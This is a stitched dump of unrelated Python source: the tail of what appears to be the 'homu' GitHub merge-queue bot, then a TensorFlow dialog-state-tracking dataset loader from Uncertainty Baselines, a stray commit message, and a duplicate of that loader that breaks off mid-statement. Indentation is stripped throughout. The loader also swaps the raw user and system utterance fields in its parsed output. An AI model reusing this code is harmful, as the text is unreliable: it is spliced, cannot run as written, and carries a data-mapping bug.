err = ''
else:
mat = re.search('<title>(.+?)</title>', res.text)
err = mat.group(1) if mat else 'Unknown error'
if err:
state.add_comment(':bomb: Failed to start rebuilding: `{}`'.format(err))
return False
state.set_status('pending')
msg_1 = 'Previous build results'
msg_2 = ' for {}'.format(', '.join('[{}]({})'.format(builder, url) for builder, url in succ_builders))
msg_3 = ' are reusable. Rebuilding'
msg_4 = ' only {}'.format(', '.join('[{}]({})'.format(builder, url) for builder, url in builders))
utils.github_create_status(state.get_repo(), state.head_sha, 'pending', '', '{}{}...'.format(msg_1, msg_3), context='homu')
state.add_comment(':zap: {}{}{}{}...'.format(msg_1, msg_2, msg_3, msg_4))
return True
def start_build_or_rebuild(state, repo_cfgs, trigger_author_cfg, gh, *args):
if start_rebuild(state, repo_cfgs):
return True
return start_build(state, repo_cfgs, trigger_author_cfg, gh, *args)
def process_queue(states, repos, repo_cfgs, trigger_author_cfg, logger,
buildbot_slots, gh):
for repo_label, repo in repos.items():
repo_states = sorted(states[repo_label].values())
for state in repo_states:
if state.status == 'pending' and not state.try_:
break
elif state.status == '' and state.approved_by:
if start_build_or_rebuild(state, repo_cfgs, trigger_author_cfg,
buildbot_slots, logger, gh):
return
elif state.status == 'success' and state.try_ and state.approved_by:
state.try_ = False
state.save()
if start_build(state, repo_cfgs, trigger_author_cfg, buildbot_slots, logger, gh):
return
for state in repo_states:
if state.status == '' and state.try_:
if start_build(state, repo_cfgs, trigger_author_cfg, buildbot_slots, logger, gh):
return
def fetch_mergeability(mergeable_que):
re_pull_num = re.compile('(?i)merge (?:of|pull request) #([0-9]+)')
while True:
try:
state, cause = mergeable_que.get()
pr = state.get_repo().pull_request(state.num)
if pr is None:
time.sleep(5)
pr = state.get_repo().pull_request(state.num)
mergeable = pr.mergeable
if mergeable is None:
time.sleep(5)
mergeable = pr.mergeable
if state.mergeable is True and mergeable is False:
if cause:
mat = re_pull_num.search(cause['title'])
if mat: issue_or_commit = '#' + mat.group(1)
else: issue_or_commit = cause['sha'][:7]
issue_or_commit = \
' (presumably {})'.format(issue_or_commit)
else:
issue_or_commit = ''
state.add_comment(':x: The latest upstream changes{} made '
'this pull request unmergeable. Please resolve the merge '
'conflicts.'.format(issue_or_commit))
state.set_mergeable(mergeable, que=False)
except:
traceback.print_exc()
finally:
mergeable_que.task_done()
def synchronize(repo_label, repo_cfg, logger, gh, states, repos, mergeable_que,
my_username, repo_labels):
logger.info('Synchronizing {}...'.format(repo_label))
db = Database()
repo = gh.repository(repo_cfg['owner'], repo_cfg['name'])
# XXX This is dangerous. We have a publicly exposed method to desrtoy state.
with db.get_connection() as db_conn:
for tbl in ['pull', 'build_res', 'mergeable']:
sql = 'DELETE FROM {} WHERE repo = %s'.format(tbl)
db_conn.cursor().execute(sql, [repo_label])
db_conn.commit()
states[repo_label] = {}
repos[repo_label] = repo
for pull in repo.iter_pulls(state='open'):
# Ignore PRs older than about two months.
update_delta = datetime.now(timezone.utc) - pull.updated_at
if 5e6 < update_delta.total_seconds():
logger.debug('Ignoring PR for merge {} because it has not ' \
'been updated since {}.'.format(pull.merge_commit_sha,
pull.updated_at))
continue
with db.get_connection() as db_conn:
cursor = db_conn.cursor()
sql = 'SELECT status FROM pull WHERE repo = %s AND num = %s'
cursor.execute(sql, [repo_label, pull.number])
row = cursor.fetchone()
if row:
status = row[0]
else:
status = ''
for info in utils.github_iter_statuses(repo, pull.head.sha):
if info.context == 'homu':
status = info.state
break
state = PullReqState(pull.number, pull.head.sha, status, repo_label,
mergeable_que, gh, repo_cfg['owner'],
repo_cfg['name'], repos)
state.title = pull.title
state.body = pull.body
state.head_ref = pull.head.repo[0] + ':' + pull.head.ref
state.base_ref = pull.base.ref
state.set_mergeable(None)
state.assignee = pull.assignee.login if pull.assignee else ''
for comment in pull.iter_comments():
if comment.original_commit_id == pull.head.sha:
parse_commands(
comment.body,
comment.user.login,
repo_cfg,
state,
my_username,
sha=comment.original_commit_id,
)
for comment in pull.iter_issue_comments():
parse_commands(
comment.body,
comment.user.login,
repo_cfg,
state,
my_username,
)
state.save()
states[repo_label][pull.number] = state
logger.info('Done synchronizing {}!'.format(repo_label))
logger.debug('Github rate limit status: {}'.format(gh.rate_limit()))
def arguments():
parser = argparse.ArgumentParser(description =
'A bot that integrates with GitHub and '
'your favorite continuous integration service')
parser.add_argument('-v', '--verbose',
action='store_true', help='Enable more verbose logging')
return parser.parse_args()
def main():
args = arguments()
logger = logging.getLogger('homu')
logger.setLevel(logging.DEBUG if args.verbose else logging.INFO)
logger.addHandler(logging.StreamHandler())
try:
with open('cfg.toml') as fp:
cfg = toml.loads(fp.read())
except FileNotFoundError:
with open('cfg.json') as fp:
cfg = json.loads(fp.read())
trigger_author_cfg = cfg.get('trigger_author', {})
gh = github3.login(token=cfg['github']['access_token'])
rate_limit = gh.rate_limit()
logger.debug('Github rate limit status: {}'.format(rate_limit))
if not rate_limit['rate']['remaining']:
reset_time = datetime.fromtimestamp(rate_limit['rate']['reset'])
logger_msg = 'Github rate limit exhausted! Sleeping until {}'
logger.info(logger_msg.format(reset_time.isoformat()))
reset_delta = reset_time - datetime.now()
time.sleep(reset_delta.total_seconds())
states = {}
repos = {}
repo_cfgs = {}
buildbot_slots = ['']
my_username = gh.user().login
repo_labels = {}
mergeable_que = Queue()
db = Database()
with db.get_connection() as db_conn:
schema_path = os.path.join(os.path.dirname(__file__), 'schema.sql')
schema = open(schema_path).read()
# execute with multi=True requires enumeration.
list(db_conn.cursor().execute(multi=True, operation=schema))
for repo_label, repo_cfg in cfg['repo'].items():
repo_cfgs[repo_label] = repo_cfg
repo_labels[repo_cfg['owner'], repo_cfg['name']] = repo_label
repo_states = {}
repos[repo_label] = None
cursor = db_conn.cursor()
cursor.execute('SELECT num, head_sha, status, title, body, ' \
'head_ref, base_ref, assignee, approved_by, ' \
'priority, try_, rollup, merge_sha FROM pull ' \
'WHERE repo = %s', [repo_label])
for (num, head_sha, status, title, body, head_ref, base_ref,
assignee, approved_by, priority, try_, rollup,
merge_sha) in cursor.fetchall():
state = PullReqState(num, head_sha, status, repo_label,
mergeable_que, gh, repo_cfg['owner'],
repo_cfg['name'], repos)
state.title = title
state.body = body
state.head_ref = head_ref
state.base_ref = base_ref
state.set_mergeable(None)
state.assignee = assignee
state.approved_by = approved_by
state.priority = int(priority)
state.try_ = bool(try_)
state.rollup = bool(rollup)
if merge_sha:
if 'buildbot' in repo_cfg:
builders = repo_cfg['buildbot']['builders']
elif 'travis' in repo_cfg:
builders = ['travis']
elif 'status' in repo_cfg:
builders = ['status']
elif 'testrunners' in repo_cfg:
builders = repo_cfg['testrunners'].get('builders', [])
else:
raise RuntimeError('Invalid configuration')
state.init_build_res(builders, use_db=False)
state.merge_sha = merge_sha
elif state.status == 'pending':
# FIXME: There might be a better solution
state.status = ''
state.save()
repo_states[num] = state
states[repo_label] = repo_states
cursor = db_conn.cursor()
cursor.execute('SELECT repo, num, builder, res, url, merge_sha FROM build_res')
for repo_label, num, builder, res, url, merge_sha in cursor.fetchall():
try:
state = states[repo_label][num]
if builder not in state.build_res: raise KeyError
if state.merge_sha != merge_sha: raise KeyError
except KeyError:
cursor = db_conn.cursor()
cursor.execute('DELETE FROM build_res WHERE repo = %s AND ' \
'num = %s AND builder = %s',
[repo_label, num, builder])
db_conn.commit()
continue
state.build_res[builder] = {
'res': bool(res) if res is not None else None,
'url': url,
}
cursor = db_conn.cursor()
cursor.execute('SELECT repo, num, mergeable FROM mergeable')
for repo_label, num, mergeable in cursor.fetchall():
try: state = states[repo_label][num]
except KeyError:
cursor = db_conn.cursor()
cursor.execute('DELETE FROM mergeable WHERE repo = %s AND ' \
'num = %s', [repo_label, num])
db_conn.commit()
continue
state.mergeable = bool(mergeable) if mergeable is not None else None
queue_handler_lock = Lock()
def queue_handler():
with queue_handler_lock:
return process_queue(states, repos, repo_cfgs,
trigger_author_cfg, logger,
buildbot_slots, gh)
from . import server
Thread(target=server.start, args=[cfg, states, queue_handler, repo_cfgs,
repos, logger, buildbot_slots,
my_username, repo_labels,
mergeable_que, gh]).start()
Thread(target=fetch_mergeability, args=[mergeable_que]).start()
for repo_label, repo_cfg in cfg['repo'].items():
t = Thread(target=synchronize,
args=[repo_label, repo_cfg, logger, gh, states, repos,
mergeable_que, my_username, repo_labels])
t.start()
queue_handler()
if __name__ == '__main__':
signal.signal(signal.SIGTERM, lambda x, y: Database().close_all())
main()
|
# coding=utf-8
# Copyright 2021 The Uncertainty Baselines Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Data loader for goal-oriented dialog state tracking datasets.
Dialog state tracking is a sequence prediction task that predicts the dialog
state label of each conversational turn in a given dialog. Currently, the
following datasets are supported.
* Synthetic Task-oriented Dialog with Controllable Complexity (SimDial) [1]
* Synthetic Multi-Domain Wizard-of-Oz (MultiWoZ-Synth) [2, 4]
* Synthetic Schema-Guided Dialogue Dataset (SGD-Synth) [3]
## References
[1]: Tiancheng Zhao and Maxine Eskenazi. Zero-Shot Dialog Generation with
Cross-Domain Latent Actions. In _Meeting of the Special Interest Group on
Discourse and Dialogue_ (SIGDIAL), 2018.
https://www.aclweb.org/anthology/W18-5001/
[2]: Pawel Budzianowski et al. MultiWOZ - A Large-Scale Multi-Domain
Wizard-of-Oz Dataset for Task-Oriented Dialogue Modelling.
In _Proceedings of the 2018 Conference on Empirical Methods in Natural L
anguage Processing_ (EMNLP), 2018.
https://aclanthology.org/D18-1547/
[3]: Abhinav Rastogi et al. Towards Scalable Multi-Domain Conversational Agents:
The Schema-Guided Dialogue Dataset. In _Proceedings of the AAAI Conference
on Artificial Intelligence_ (AAAI), 2020.
https://arxiv.org/abs/1909.05855
[4]: Campagna, Giovanni et al. Zero-Shot Transfer Learning with Synthesized Data
for Multi-Domain Dialogue State Tracking.
In _Proceedings of the 58th Annual Meeting of the Association for
Computational Linguistics_(ACL), 2020.
https://arxiv.org/abs/2005.00891
"""
import json
import os
from typing import Dict, Tuple, Optional, Any
import tensorflow.compat.v2 as tf
import tensorflow_datasets as tfds
from uncertainty_baselines.datasets import base
USR_UTT_NAME = 'usr_utt'
SYS_UTT_NAME = 'sys_utt'
USR_UTT_RAW_NAME = 'usr_utt_raw'
SYS_UTT_RAW_NAME = 'sys_utt_raw'
STATE_LABEL_NAME = 'label'
DOMAIN_LABEL_NAME = 'domain_label'
DIAL_LEN_NAME = 'dialog_len'
DIAL_TURN_ID_NAME = 'dialog_turn_id'
FILENAME_META = 'meta.json'
FILENAME_TOKENIZER = 'id_to_vocab.json'
FILENAME_TOKENIZER_LABEL = 'id_to_vocab_label.json'
FILENAME_TOKENIZER_DOMAIN_LABEL = 'id_to_vocab_domain_label.json'
FILENAME_TRAIN = 'train.tfrecord'
FILENAME_TEST = 'test.tfrecord'
MAX_UTT_LEN = dict(simdial=40, multiwoz_synth=42, sgd_synth=76)
MAX_DIALOG_LEN = dict(simdial=13, multiwoz_synth=7, sgd_synth=24)
VOCAB_SIZE_UTT = dict(simdial=474, multiwoz_synth=1506, sgd_synth=6709)
VOCAB_SIZE_LABEL = dict(simdial=52, multiwoz_synth=10, sgd_synth=39)
NUM_TRAIN = dict(simdial=6400, multiwoz_synth=7500, sgd_synth=8100)
NUM_TEST = dict(simdial=1600, multiwoz_synth=1500, sgd_synth=2700)
# Use test as stand-in for val. In practice we never use this dataset.
NUM_VAL = NUM_TEST
FILENAME_VALID = FILENAME_TEST
def _build_dataset(glob_dir: str, is_training: bool) -> tf.data.Dataset:
cycle_len = 10 if is_training else 1
dataset = tf.data.Dataset.list_files(glob_dir, shuffle=is_training)
dataset = dataset.interleave(tf.data.TFRecordDataset, cycle_length=cycle_len)
return dataset
def _make_features_spec(
load_domain_label: bool) -> Dict[str, tf.io.FixedLenFeature]:
"""Specifies dataset example feature types."""
feature_spec = {
USR_UTT_NAME: tf.io.FixedLenFeature([], tf.string, default_value=''),
SYS_UTT_NAME: tf.io.FixedLenFeature([], tf.string, default_value=''),
USR_UTT_RAW_NAME: tf.io.FixedLenFeature([], tf.string, default_value=''),
SYS_UTT_RAW_NAME: tf.io.FixedLenFeature([], tf.string, default_value=''),
STATE_LABEL_NAME: tf.io.FixedLenFeature([], tf.string, default_value=''),
DIAL_LEN_NAME: tf.io.FixedLenFeature([], tf.int64, default_value=0)
}
if load_domain_label:
feature_spec[DOMAIN_LABEL_NAME] = tf.io.FixedLenFeature([],
tf.string,
default_value='')
return feature_spec
def _get_num_examples_and_filenames(
dataset_name) -> Tuple[Dict[str, int], Dict[str, str]]:
"""Retrieves the number of examples and filenames according to data mode."""
num_examples = {
'train': NUM_TRAIN[dataset_name],
'validation': NUM_VAL[dataset_name],
'test': NUM_TEST[dataset_name]
}
file_names = {
'train': FILENAME_TRAIN,
'validation': FILENAME_VALID,
'test': FILENAME_TEST,
'metadata': FILENAME_META
}
return num_examples, file_names
def load_json(json_dir: str) -> Dict[Any, Any]:
with tf.io.gfile.GFile(json_dir) as json_file:
return json.load(json_file)
_CITATION = {
'simdial':
"""
@article{zhao2018zero,
title={Zero-Shot Dialog Generation with Cross-Domain Latent Actions},
author={Zhao, Tiancheng and Eskenazi, Maxine},
journal={arXiv preprint arXiv:1805.04803},
year={2018}
}
"""
}
_HOMEPAGE = {'simdial': 'https://github.com/snakeztc/SimDial'}
_DESCRIPTION = {
'simdial':
('Simulated goal-oriented conversations [1] generated for information '
'requests in four domains: bus, restaurant, weather, and movie.')
}
class _DialogStateTrackingDatasetBuilder(tfds.core.DatasetBuilder):
"""Minimal TFDS DatasetBuilder, does not support downloading."""
VERSION = tfds.core.Version('1.0.0')
RELEASE_NOTES = {
'1.0.0': 'Initial release.',
}
def __init__(self, name, data_dir, load_domain_label, **kwargs):
self._data_name = name
self._num_examples, self._file_names = _get_num_examples_and_filenames(name)
self._file_paths = self._get_file_paths(data_dir)
self._load_domain_label = load_domain_label
super().__init__(data_dir=data_dir, **kwargs)
# We have to reset self._data_dir since the parent class appends the class
# name and version to dir name.
self._data_dir = data_dir
def _download_and_prepare(self, dl_manager, download_config=None):
"""Downloads and prepares dataset for reading."""
raise NotImplementedError(
'Must provide a data_dir with the files already downloaded to.')
def _get_file_paths(self, data_dir) -> Dict[str, str]:
"""Returns the full path to file."""
get_full_path = lambda name: os.path.join(data_dir, name)
return {
'train': get_full_path(self._file_names['train']),
'validation': get_full_path(self._file_names['validation']),
'test': get_full_path(self._file_names['test']),
'metadata': get_full_path(self._file_names['metadata'])
}
def _as_dataset(self,
split: tfds.Split,
decoders=None,
read_config=None,
shuffle_files=False) -> tf.data.Dataset:
"""Constructs a `tf.data.Dataset`."""
del decoders
del read_config
del shuffle_files
if split == tfds.Split.TRAIN:
return _build_dataset(
glob_dir=self._file_paths['train'], is_training=True)
elif split == tfds.Split.VALIDATION:
return _build_dataset(
glob_dir=self._file_paths['validation'], is_training=False)
elif split == tfds.Split.TEST:
return _build_dataset(
glob_dir=self._file_paths['test'], is_training=False)
raise ValueError('Unsupported split given: {}.'.format(split))
def _info(self) -> tfds.core.DatasetInfo:
"""Returns the `tfds.core.DatasetInfo` object."""
metadata_dict = load_json(self._file_paths['metadata'])
has_domain_label = metadata_dict.get('has_domain_label', False)
features = {
USR_UTT_NAME: tfds.features.Tensor(shape=[], dtype=tf.string),
SYS_UTT_NAME: tfds.features.Tensor(shape=[], dtype=tf.string),
USR_UTT_RAW_NAME: tfds.features.Tensor(shape=[], dtype=tf.string),
SYS_UTT_RAW_NAME: tfds.features.Tensor(shape=[], dtype=tf.string),
STATE_LABEL_NAME: tfds.features.Tensor(shape=[], dtype=tf.string),
DIAL_LEN_NAME: tfds.features.Tensor(shape=[], dtype=tf.int64)
}
# Optionally, load domain labels if it exists.
if self._load_domain_label and has_domain_label:
features[DOMAIN_LABEL_NAME] = tfds.features.Tensor(
shape=[], dtype=tf.string)
elif self._load_domain_label and not has_domain_label:
raise ValueError(
'load_domain_label=True, but the dataset does not have domain label'
'according to metadata ({}).'.format(self._file_paths['metadata']))
info = tfds.core.DatasetInfo(
builder=self,
features=tfds.features.FeaturesDict(features),
# Note that while metadata seems to be the most appropriate way to store
# arbitrary info, it will not be printed when printing out the dataset
# info.
metadata=tfds.core.MetadataDict(**metadata_dict),
description=_DESCRIPTION.get(self._data_name, ''),
homepage=_HOMEPAGE.get(self._data_name, ''),
citation=_CITATION.get(self._data_name, ''))
# Instead of having a single element shard_lengths, we should really have a
# list of the number of elements in each file shard in each split.
split_infos = [
tfds.core.SplitInfo(
name=tfds.Split.VALIDATION,
shard_lengths=[self._num_examples['validation']],
num_bytes=0,
),
tfds.core.SplitInfo(
name=tfds.Split.TEST,
shard_lengths=[self._num_examples['test']],
num_bytes=0,
),
tfds.core.SplitInfo(
name=tfds.Split.TRAIN,
shard_lengths=[self._num_examples['train']],
num_bytes=0,
),
]
split_dict = tfds.core.SplitDict(
split_infos, dataset_name='__dialog_state_tracking_dataset_builder')
info.set_splits(split_dict)
return info
class _DialogStateTrackingDataset(base.BaseDataset):
"""SimDial dataset builder class."""
def __init__(self,
name: str,
split: str,
load_domain_label: bool = True,
add_dialog_turn_id: Optional[bool] = False,
shuffle_buffer_size: Optional[int] = None,
num_parallel_parser_calls: int = 64,
data_dir: Optional[str] = None,
download_data: bool = False,
is_training: Optional[bool] = None,
**kwargs: Any):
"""Create a dialog state tracking tf.data.Dataset builder.
Args:
name: the name of the dataset.
split: a dataset split, either a custom tfds.Split or one of the
tfds.Split enums [TRAIN, VALIDAITON, TEST] or their lowercase string
names.
load_domain_label: Whether to load dialog domain labels as well. Currently
only wroks for `SGDSyntheticDataset`.
add_dialog_turn_id: Whether to add a unique id for each dialog turn.
shuffle_buffer_size: the number of example to use in the shuffle buffer
for tf.data.Dataset.shuffle().
num_parallel_parser_calls: the number of parallel threads to use while
preprocessing in tf.data.Dataset.map().
data_dir: path to a directory containing the tfrecord datasets.
download_data: Whether or not to download data before loading. Currently
unsupported.
is_training: Whether or not the given `split` is the training split. Only
required when the passed split is not one of ['train', 'validation',
'test', tfds.Split.TRAIN, tfds.Split.VALIDATION, tfds.Split.TEST].
**kwargs: optional arguments passed to base.BaseDataset.__init__.
"""
# Load vocab for dialog utterances and state labels.
self.load_domain_label = load_domain_label
# Specify a unique id for a turn in a dialog.
self.add_dialog_turn_id = add_dialog_turn_id
self.vocab_utter = load_json(os.path.join(data_dir, FILENAME_TOKENIZER))
self.vocab_label = load_json(
os.path.join(data_dir, FILENAME_TOKENIZER_LABEL))
if self.load_domain_label:
self.vocab_domain_label = load_json(
os.path.join(data_dir, FILENAME_TOKENIZER_DOMAIN_LABEL))
dataset_builder = _DialogStateTrackingDatasetBuilder(
name, data_dir, load_domain_label)
super().__init__(
name=name,
dataset_builder=dataset_builder,
split=split,
is_training=is_training,
shuffle_buffer_size=shuffle_buffer_size,
num_parallel_parser_calls=num_parallel_parser_calls,
download_data=False,
**kwargs)
def _create_process_example_fn(self) -> base.PreProcessFn:
def _example_parser(example: Dict[str, tf.Tensor]) -> Dict[str, tf.Tensor]:
"""Parse features and labels from a serialized tf.train.Example."""
features_spec = _make_features_spec(self.load_domain_label)
features = tf.io.parse_single_example(example['features'], features_spec)
sys_utt = tf.io.parse_tensor(features[SYS_UTT_NAME], out_type=tf.int32)
usr_utt = tf.io.parse_tensor(features[USR_UTT_NAME], out_type=tf.int32)
sys_utt_raw = tf.io.parse_tensor(
features[SYS_UTT_RAW_NAME], out_type=tf.string)
usr_utt_raw = tf.io.parse_tensor(
features[USR_UTT_RAW_NAME], out_type=tf.string)
state_label = tf.io.parse_tensor(
features[STATE_LABEL_NAME], out_type=tf.int32)
dialog_len = features[DIAL_LEN_NAME]
# Extract maxmimum dialog and utterance lengths.
max_dialog_len = MAX_DIALOG_LEN[self.name]
max_utt_len = MAX_UTT_LEN[self.name]
# Ensure shape of parsed tensors.
sys_utt = tf.ensure_shape(sys_utt, (max_dialog_len, max_utt_len))
usr_utt = tf.ensure_shape(usr_utt, (max_dialog_len, max_utt_len))
sys_utt_raw = tf.ensure_shape(sys_utt_raw, (max_dialog_len,))
usr_utt_raw = tf.ensure_shape(usr_utt_raw, (max_dialog_len,))
state_label = tf.ensure_shape(state_label, (max_dialog_len,))
parsed_example = {
SYS_UTT_NAME: sys_utt,
USR_UTT_NAME: usr_utt,
USR_UTT_RAW_NAME: sys_utt_raw,
SYS_UTT_RAW_NAME: usr_utt_raw,
STATE_LABEL_NAME: state_label,
DIAL_LEN_NAME: dialog_len,
}
# Optionally, load domain labels.
if self.load_domain_label:
domain_label = tf.io.parse_tensor(
features[DOMAIN_LABEL_NAME], out_type=tf.int32)
domain_label = tf.ensure_shape(domain_label, (max_dialog_len,))
parsed_example[DOMAIN_LABEL_NAME] = domain_label
if self.add_dialog_turn_id:
example_id = example[self._fingerprint_key]
dialog_turn_id = tf.range(
example_id * max_dialog_len, (example_id + 1) * max_dialog_len,
dtype=tf.int32)
dialog_turn_id = tf.ensure_shape(dialog_turn_id, (max_dialog_len))
parsed_example[DIAL_TURN_ID_NAME] = dialog_turn_id
return parsed_example
return _example_parser
class SimDialDataset(_DialogStateTrackingDataset):
"""SimDial dataset builder class."""
def __init__(self, data_dir=None, **kwargs):
super().__init__(name='simdial', data_dir=data_dir, **kwargs)
class MultiWoZSynthDataset(_DialogStateTrackingDataset):
"""SimDial dataset builder class."""
def __init__(self, data_dir=None, **kwargs):
super().__init__(name='multiwoz_synth', data_dir=data_dir, **kwargs)
class SGDSynthDataset(_DialogStateTrackingDataset):
"""SimDial dataset builder class."""
def __init__(self, data_dir=None, **kwargs):
super().__init__(name='sgd_synth', data_dir=data_dir, **kwargs)
Fix typo in dialog_state_tracking dataset
PiperOrigin-RevId: 411317014
# coding=utf-8
# Copyright 2021 The Uncertainty Baselines Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Data loader for goal-oriented dialog state tracking datasets.
Dialog state tracking is a sequence prediction task that predicts the dialog
state label of each conversational turn in a given dialog. Currently, the
following datasets are supported.
* Synthetic Task-oriented Dialog with Controllable Complexity (SimDial) [1]
* Synthetic Multi-Domain Wizard-of-Oz (MultiWoZ-Synth) [2, 4]
* Synthetic Schema-Guided Dialogue Dataset (SGD-Synth) [3]
## References
[1]: Tiancheng Zhao and Maxine Eskenazi. Zero-Shot Dialog Generation with
Cross-Domain Latent Actions. In _Meeting of the Special Interest Group on
Discourse and Dialogue_ (SIGDIAL), 2018.
https://www.aclweb.org/anthology/W18-5001/
[2]: Pawel Budzianowski et al. MultiWOZ - A Large-Scale Multi-Domain
Wizard-of-Oz Dataset for Task-Oriented Dialogue Modelling.
In _Proceedings of the 2018 Conference on Empirical Methods in Natural L
anguage Processing_ (EMNLP), 2018.
https://aclanthology.org/D18-1547/
[3]: Abhinav Rastogi et al. Towards Scalable Multi-Domain Conversational Agents:
The Schema-Guided Dialogue Dataset. In _Proceedings of the AAAI Conference
on Artificial Intelligence_ (AAAI), 2020.
https://arxiv.org/abs/1909.05855
[4]: Campagna, Giovanni et al. Zero-Shot Transfer Learning with Synthesized Data
for Multi-Domain Dialogue State Tracking.
In _Proceedings of the 58th Annual Meeting of the Association for
Computational Linguistics_(ACL), 2020.
https://arxiv.org/abs/2005.00891
"""
import json
import os
from typing import Dict, Tuple, Optional, Any
import tensorflow.compat.v2 as tf
import tensorflow_datasets as tfds
from uncertainty_baselines.datasets import base
USR_UTT_NAME = 'usr_utt'
SYS_UTT_NAME = 'sys_utt'
USR_UTT_RAW_NAME = 'usr_utt_raw'
SYS_UTT_RAW_NAME = 'sys_utt_raw'
STATE_LABEL_NAME = 'label'
DOMAIN_LABEL_NAME = 'domain_label'
DIAL_LEN_NAME = 'dialog_len'
DIAL_TURN_ID_NAME = 'dialog_turn_id'
FILENAME_META = 'meta.json'
FILENAME_TOKENIZER = 'id_to_vocab.json'
FILENAME_TOKENIZER_LABEL = 'id_to_vocab_label.json'
FILENAME_TOKENIZER_DOMAIN_LABEL = 'id_to_vocab_domain_label.json'
FILENAME_TRAIN = 'train.tfrecord'
FILENAME_TEST = 'test.tfrecord'
MAX_UTT_LEN = dict(simdial=40, multiwoz_synth=42, sgd_synth=76)
MAX_DIALOG_LEN = dict(simdial=13, multiwoz_synth=7, sgd_synth=24)
VOCAB_SIZE_UTT = dict(simdial=474, multiwoz_synth=1506, sgd_synth=6709)
VOCAB_SIZE_LABEL = dict(simdial=52, multiwoz_synth=10, sgd_synth=39)
NUM_TRAIN = dict(simdial=6400, multiwoz_synth=7500, sgd_synth=8100)
NUM_TEST = dict(simdial=1600, multiwoz_synth=1500, sgd_synth=2700)
# Use test as stand-in for val. In practice we never use this dataset.
NUM_VAL = NUM_TEST
FILENAME_VALID = FILENAME_TEST
def _build_dataset(glob_dir: str, is_training: bool) -> tf.data.Dataset:
cycle_len = 10 if is_training else 1
dataset = tf.data.Dataset.list_files(glob_dir, shuffle=is_training)
dataset = dataset.interleave(tf.data.TFRecordDataset, cycle_length=cycle_len)
return dataset
def _make_features_spec(
load_domain_label: bool) -> Dict[str, tf.io.FixedLenFeature]:
"""Specifies dataset example feature types."""
feature_spec = {
USR_UTT_NAME: tf.io.FixedLenFeature([], tf.string, default_value=''),
SYS_UTT_NAME: tf.io.FixedLenFeature([], tf.string, default_value=''),
USR_UTT_RAW_NAME: tf.io.FixedLenFeature([], tf.string, default_value=''),
SYS_UTT_RAW_NAME: tf.io.FixedLenFeature([], tf.string, default_value=''),
STATE_LABEL_NAME: tf.io.FixedLenFeature([], tf.string, default_value=''),
DIAL_LEN_NAME: tf.io.FixedLenFeature([], tf.int64, default_value=0)
}
if load_domain_label:
feature_spec[DOMAIN_LABEL_NAME] = tf.io.FixedLenFeature([],
tf.string,
default_value='')
return feature_spec
def _get_num_examples_and_filenames(
dataset_name) -> Tuple[Dict[str, int], Dict[str, str]]:
"""Retrieves the number of examples and filenames according to data mode."""
num_examples = {
'train': NUM_TRAIN[dataset_name],
'validation': NUM_VAL[dataset_name],
'test': NUM_TEST[dataset_name]
}
file_names = {
'train': FILENAME_TRAIN,
'validation': FILENAME_VALID,
'test': FILENAME_TEST,
'metadata': FILENAME_META
}
return num_examples, file_names
def load_json(json_dir: str) -> Dict[Any, Any]:
with tf.io.gfile.GFile(json_dir) as json_file:
return json.load(json_file)
_CITATION = {
'simdial':
"""
@article{zhao2018zero,
title={Zero-Shot Dialog Generation with Cross-Domain Latent Actions},
author={Zhao, Tiancheng and Eskenazi, Maxine},
journal={arXiv preprint arXiv:1805.04803},
year={2018}
}
"""
}
_HOMEPAGE = {'simdial': 'https://github.com/snakeztc/SimDial'}
_DESCRIPTION = {
'simdial':
('Simulated goal-oriented conversations [1] generated for information '
'requests in four domains: bus, restaurant, weather, and movie.')
}
class _DialogStateTrackingDatasetBuilder(tfds.core.DatasetBuilder):
"""Minimal TFDS DatasetBuilder, does not support downloading."""
VERSION = tfds.core.Version('1.0.0')
RELEASE_NOTES = {
'1.0.0': 'Initial release.',
}
def __init__(self, name, data_dir, load_domain_label, **kwargs):
self._data_name = name
self._num_examples, self._file_names = _get_num_examples_and_filenames(name)
self._file_paths = self._get_file_paths(data_dir)
self._load_domain_label = load_domain_label
super().__init__(data_dir=data_dir, **kwargs)
# We have to reset self._data_dir since the parent class appends the class
# name and version to dir name.
self._data_dir = data_dir
def _download_and_prepare(self, dl_manager, download_config=None):
"""Downloads and prepares dataset for reading."""
raise NotImplementedError(
'Must provide a data_dir with the files already downloaded to.')
def _get_file_paths(self, data_dir) -> Dict[str, str]:
"""Returns the full path to file."""
get_full_path = lambda name: os.path.join(data_dir, name)
return {
'train': get_full_path(self._file_names['train']),
'validation': get_full_path(self._file_names['validation']),
'test': get_full_path(self._file_names['test']),
'metadata': get_full_path(self._file_names['metadata'])
}
def _as_dataset(self,
split: tfds.Split,
decoders=None,
read_config=None,
shuffle_files=False) -> tf.data.Dataset:
"""Constructs a `tf.data.Dataset`."""
del decoders
del read_config
del shuffle_files
if split == tfds.Split.TRAIN:
return _build_dataset(
glob_dir=self._file_paths['train'], is_training=True)
elif split == tfds.Split.VALIDATION:
return _build_dataset(
glob_dir=self._file_paths['validation'], is_training=False)
elif split == tfds.Split.TEST:
return _build_dataset(
glob_dir=self._file_paths['test'], is_training=False)
raise ValueError('Unsupported split given: {}.'.format(split))
def _info(self) -> tfds.core.DatasetInfo:
"""Returns the `tfds.core.DatasetInfo` object."""
metadata_dict = load_json(self._file_paths['metadata'])
has_domain_label = metadata_dict.get('has_domain_label', False)
features = {
USR_UTT_NAME: tfds.features.Tensor(shape=[], dtype=tf.string),
SYS_UTT_NAME: tfds.features.Tensor(shape=[], dtype=tf.string),
USR_UTT_RAW_NAME: tfds.features.Tensor(shape=[], dtype=tf.string),
SYS_UTT_RAW_NAME: tfds.features.Tensor(shape=[], dtype=tf.string),
STATE_LABEL_NAME: tfds.features.Tensor(shape=[], dtype=tf.string),
DIAL_LEN_NAME: tfds.features.Tensor(shape=[], dtype=tf.int64)
}
# Optionally, load domain labels if it exists.
if self._load_domain_label and has_domain_label:
features[DOMAIN_LABEL_NAME] = tfds.features.Tensor(
